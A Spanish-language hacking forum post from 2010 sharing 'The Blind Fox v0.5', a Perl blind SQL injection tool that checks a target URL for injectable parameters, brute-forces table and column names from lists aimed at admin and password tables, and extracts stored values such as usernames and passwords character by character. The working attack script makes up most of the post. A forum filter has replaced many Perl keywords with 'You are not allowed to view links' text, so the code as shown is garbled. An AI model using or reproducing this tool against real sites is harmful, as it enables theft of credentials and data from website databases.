send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

The Blind Fox V0.5

  • 0 Respuestas
  • 1609 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado DeuSer

  • *
  • Underc0der
  • Mensajes: 66
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Marzo 25, 2010, 07:45:08 pm »
El amigo Login-Root creo una nueva herramienta desarrollada en perl para SQL pero en este caso para Blind SQL, la cual sirve para:

1- Chekeo AND 1=1 y AND 1=0 (verificacion de vuln.)
2- Information_Schema && MySQL.User
3- Tablas
4- Columnas
5- Extrae valores de las tablas (Opcional)

Código: Perl
  1. #!/usr/bin/perl
  2.  
  3. ####################################################################
  4. #                           -[+]- The Blind Fox v0.5 | By Login-Root -[+]-              ###
  5. ####################################################################
  6.  
  7. ####################################################################
  8. # [+] inf0:                                                                             ###
  9. ####################################################################
  10. # Busca:                                                                                ###
  11. # ======                                                                                ###
  12. #  - Checkeo AND 1=1 && AND 1=0                                                         ###      
  13. #  - Information_Schema && MySQL.User                                                   ###
  14. #  - Tablas                                                                             ###                                              
  15. #  - Columnas                                                                           ###
  16. #  - Extrae valores de las tablas (Opcional)                                            ###
  17. #                                                                                       ###
  18. #  ...y guarda todo en un archivo de texto.                                             ###
  19. #                                                                                       ###
  20. ###########################################################################################
  21.  
  22. ###########################################################################################
  23. # [+] Use:                                                                              ###
  24. ###########################################################################################
  25. # perl blindfox.pl [WEBSITE] [PATRON] [FILE] [-EXT]                                     ###
  26. #   [WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)            ###
  27. #   [PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0                ###
  28. #   [FILE]:    Archivo donde guardar informe                                            ###
  29. #   [-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)              ###
  30. ###########################################################################################
  31.  
  32. ###########################################################################################
  33. # [+] c0ntact:                                                                          ###
  34. ###########################################################################################
  35. # MSN:    no.more@passport.com                                                          ###
  36. # Jabber: login-root@x23.eu                                                             ###
  37. # E-Mail: login_root@yahoo.com.ar                                                       ###
  38. ###########################################################################################
  39.  
  40. ###########################################################################################
  41. # [+] sh0utz:                                                                           ###
  42. ###########################################################################################
  43. # In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
  44. # Many thanks to boER, who teach me a little of perl ;D                                 ###
  45. # VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                    ###
  46. ###########################################################################################
  47.  
  48. use LWP::Simple;
  49.  
  50. if(!$ARGV[2])
  51.     {
  52.          You are not allowed to view links. Register or Login "
  53. -[+]- The Blind Fox v0.5 | By Login-Root -[+]-
  54. ==============================================";
  55.          You are not allowed to view links. Register or Login "
  56. Uso: perl $0 [WEBSITE] [PATRON] [FILE] [-EXT]
  57. ";
  58.          You are not allowed to view links. Register or Login "
  59. [WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)
  60. [PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0
  61. [FILE]:    Archivo donde guardar informe
  62. [-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)
  63. ";
  64.          You are not allowed to view links. Register or Login (0);
  65.     }
  66.    
  67. sub end()
  68. {
  69.     You are not allowed to view links. Register or Login WEB "
  70.  
  71. [*EOF*]";
  72.     You are not allowed to view links. Register or Login "
  73. [+] Todo salvado correctamente en $ARGV[2]
  74. ";
  75.     You are not allowed to view links. Register or Login "## c0ded by Login-Root | 2008 ##
  76. ";
  77.     You are not allowed to view links. Register or Login (0);
  78. }  
  79.  
  80.    
  81. @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
  82.       'name','names','nombre','nombres','member','members','admin_table',
  83.       'miembro','miembros','membername','admins','administrator','sign',
  84.       'administrators','passwd','password','passwords','pass','Pass',
  85.       'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
  86.       'member_password','mods','mod','moderators','moderator','user_email',
  87.       'user_emails','user_mail','user_mails','mail','emails','email','address',
  88.       'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
  89.       'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  90.       'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
  91.       'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  92.       'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin',
  93.       'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
  94.       'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
  95.       'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
  96.       'associated','accnt','customers','customer','membres','administrateur','utilisateur',
  97.       'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
  98.       'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
  99.       'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  100.  
  101. @nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  102.           'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  103.           'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
  104.           'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  105.           'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  106.           'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
  107.  
  108. if ( $ARGV[0]   !~   /^http:/ )
  109.   {
  110.       $ARGV[0] = "http://" . $ARGV[0];
  111.   }
  112.  
  113. You are not allowed to view links. Register or Login(WEB,">>".$ARGV[2]) || You are not allowed to view links. Register or Login "
  114. [-] Imposible crear el archivo de texto
  115. ";
  116. You are not allowed to view links. Register or Login WEB "[WEBSITE]:
  117. $ARGV[0]
  118. ";
  119. You are not allowed to view links. Register or Login "
  120. [!] Chequeando por el patron...
  121. ";
  122.       $sql=$ARGV[0]." AND 1=1";
  123.       $response=get($sql);
  124.       if($response =~ /$ARGV[1]/)
  125.         {
  126.             You are not allowed to view links. Register or Login "
  127. [+] Patron encontrado con AND 1=1
  128. ";
  129.             You are not allowed to view links. Register or Login WEB "$sql => OK !
  130. ";
  131.             $sql=$ARGV[0]." AND 1=0";
  132.             $response=get($sql);
  133.             if($response =~ /$ARGV[1]/)
  134.             {
  135.                 You are not allowed to view links. Register or Login "[-] Patron encontrado tambien con AND 1=0, posiblemente no vulnerable a Blind SQL Inyection, probar con otro patron
  136. ";
  137.                 You are not allowed to view links. Register or Login (0);
  138.             }
  139.             else
  140.             {
  141.                 You are not allowed to view links. Register or Login "[+] Patron no encontrado con AND 1=0, website vulnerable a Blind SQL Inyection
  142. ";
  143.                 You are not allowed to view links. Register or Login WEB "$sql => OK !
  144. ";
  145.             }
  146.          }
  147.          else
  148.                  {
  149.                      You are not allowed to view links. Register or Login "[-] Patron no encontrado, probar con otro
  150. ";
  151.                      You are not allowed to view links. Register or Login (0);
  152.                  }
  153.         You are not allowed to view links. Register or Login "
  154. [!] Chequeando si existe Information_Schema...";
  155.         $sql=$ARGV[0]." AND (SELECT Count(*) FROM information_schema.tables)";
  156.         $response=get($sql);
  157.          if($response =~ /$ARGV[1]/)
  158.              {
  159.                  You are not allowed to view links. Register or Login "
  160. [+] Information_Schema disponible...guardando en $ARGV[2]";
  161.                 You are not allowed to view links. Register or Login WEB "
  162. [INFORMATION_SCHEMA]:
  163. $sql
  164. ";
  165.                
  166.              }
  167.          else
  168.              {
  169.                 You are not allowed to view links. Register or Login "
  170. [-] Information_Schema no disponible";
  171.              }
  172.         You are not allowed to view links. Register or Login "
  173. [!] Chequeando si existe MySQL.User...";
  174.         $sql=$ARGV[0]." AND (SELECT Count(*) FROM mysql.user)";
  175.         $response=get($sql);
  176.          if($response =~ /$ARGV[1]/)
  177.              {
  178.                  You are not allowed to view links. Register or Login "
  179. [+] MySQL.User disponible...guardando en $ARGV[2]";
  180.                 You are not allowed to view links. Register or Login WEB "
  181. [MYSQL.USER]:
  182. $sql
  183. ";
  184.                
  185.              }
  186.          else
  187.              {
  188.                 You are not allowed to view links. Register or Login "
  189. [-] MySQL.User no disponible";
  190.              }
  191.         You are not allowed to view links. Register or Login "
  192. [!] Bruteando tablas...";
  193.         You are not allowed to view links. Register or Login WEB "
  194. [TABLAS]:
  195. ";
  196.         foreach $tabla(@nombretabla)
  197.          {
  198.                   You are not allowed to view links. Register or Login($tabla);
  199.                   $sql=$ARGV[0]." AND (SELECT Count(*) FROM ".$tabla.")";
  200.                   $response=get($sql);
  201.                   if($response =~ /$ARGV[1]/)
  202.                     {
  203.                         You are not allowed to view links. Register or Login "
  204. [+] La tabla $tabla esta disponible...guardando en $ARGV[2]";
  205.                         You are not allowed to view links. Register or Login WEB "$sql
  206. ";
  207.                     }
  208.                 }
  209.         You are not allowed to view links. Register or Login "
  210. [!] Tabla a la cual brutear columnas: ";
  211.             $tabla.=<STDIN>;
  212.             You are not allowed to view links. Register or Login($tabla);
  213.             You are not allowed to view links. Register or Login WEB "
  214. [COLUMNAS EN $tabla]:
  215. ";
  216.             foreach $columna(@nombrecolumna)
  217.             {
  218.              You are not allowed to view links. Register or Login($columna);
  219.              $sql=$ARGV[0]." AND (SELECT Count(".$columna.") FROM ".$tabla.")";
  220.              $response=get($sql);
  221.              if ($response =~ /$ARGV[1]/)
  222.                   {
  223.                       You are not allowed to view links. Register or Login "[+] La columna $columna esta disponible...guardando en $ARGV[2]
  224. ";
  225.                       You are not allowed to view links. Register or Login WEB "$sql
  226. ";
  227.                   }
  228.             }
  229.          if ($ARGV[3] =~ /-EXT/)
  230.          {
  231.              extrac:
  232.              $columna = '';
  233.              You are not allowed to view links. Register or Login "
  234. [!] Columna de la tabla $tabla a la cual extraer campos: ";
  235.              $columna.=<STDIN>;
  236.             You are not allowed to view links. Register or Login($columna);
  237.              You are not allowed to view links. Register or Login "[!] Extrayendo valores de la tabla $tabla y columna $columna (puede demorar mucho tiempo)...
  238. ";
  239.              You are not allowed to view links. Register or Login WEB "
  240. [Valores de la tabla $tabla y columna $columna]:
  241. ";
  242.              $search = 1;
  243.              $posicion = 1;
  244.              $limit = 0;
  245.              $comprob = 1;
  246.              while ($search <= 255)
  247.              {
  248.                  $sql=$ARGV[0]." AND ascii(substring((SELECT " .$columna. " FROM " .$tabla." limit " .$limit.",1),".$posicion.",1)) = " .$search;
  249.                  $response=get($sql);
  250.                  if ($response =~ /$ARGV[1]/)
  251.                   {
  252.                         $char = You are not allowed to view links. Register or Login($search);
  253.                         You are not allowed to view links. Register or Login WEB "$char";
  254.                         You are not allowed to view links. Register or Login "$char";
  255.                       $search = 0;
  256.                       $posicion++;
  257.                       $comprob++;
  258.                   }
  259.                  if ($search == 255)
  260.                  {
  261.                      You are not allowed to view links. Register or Login "
  262. ";
  263.                      You are not allowed to view links. Register or Login WEB "
  264. ";
  265.                      if ($comprob == 1)
  266.                      {
  267.                          $eleccion = '';
  268.                          You are not allowed to view links. Register or Login "[+] Busqueda finalizada. Desea extraer valores de otra columna? [Y/N]: ";
  269.                          $eleccion.=<STDIN>;
  270.                          You are not allowed to view links. Register or Login($eleccion);
  271.                          if ($eleccion =~ /Y/)
  272.                          {
  273.                              You are not allowed to view links. Register or Login extrac;
  274.                          }
  275.                          else
  276.                          {
  277.                             end();
  278.                          }
  279.                      }
  280.                      $comprob = 1;
  281.                      $search = 0;
  282.                     $limit++;
  283.                  }
  284.                  $search++;
  285.             }
  286.            }
  287. end();
« Última modificación: Agosto 16, 2014, 10:30:29 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Blind SQLi desde cero [SQLi a ciegas] by ANTRAX

Iniciado por ANTRAX

Respuestas: 20
Vistas: 9014
Último mensaje Julio 27, 2014, 01:04:47 am
por DRAKONE
[Curso] SQL Injection desde 0 - Union based y Blind Boolean Based.

Iniciado por M5f3r0

Respuestas: 8
Vistas: 7581
Último mensaje Abril 21, 2017, 04:36:34 am
por M5f3r0
Tecnicas de Blind Mysql Injection (Bit Shifting && Find_in_set())

Iniciado por q3rv0

Respuestas: 3
Vistas: 1917
Último mensaje Agosto 30, 2012, 12:50:52 am
por andrewtwo
Blind Mysqli Time Based [Teoria]

Iniciado por q3rv0

Respuestas: 3
Vistas: 1860
Último mensaje Diciembre 22, 2012, 02:05:23 am
por Abnormality
Busqueda Binaria Aplicada a las Blind SQL Injection by OzX

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2020
Último mensaje Febrero 24, 2010, 02:38:44 pm
por dracko.rx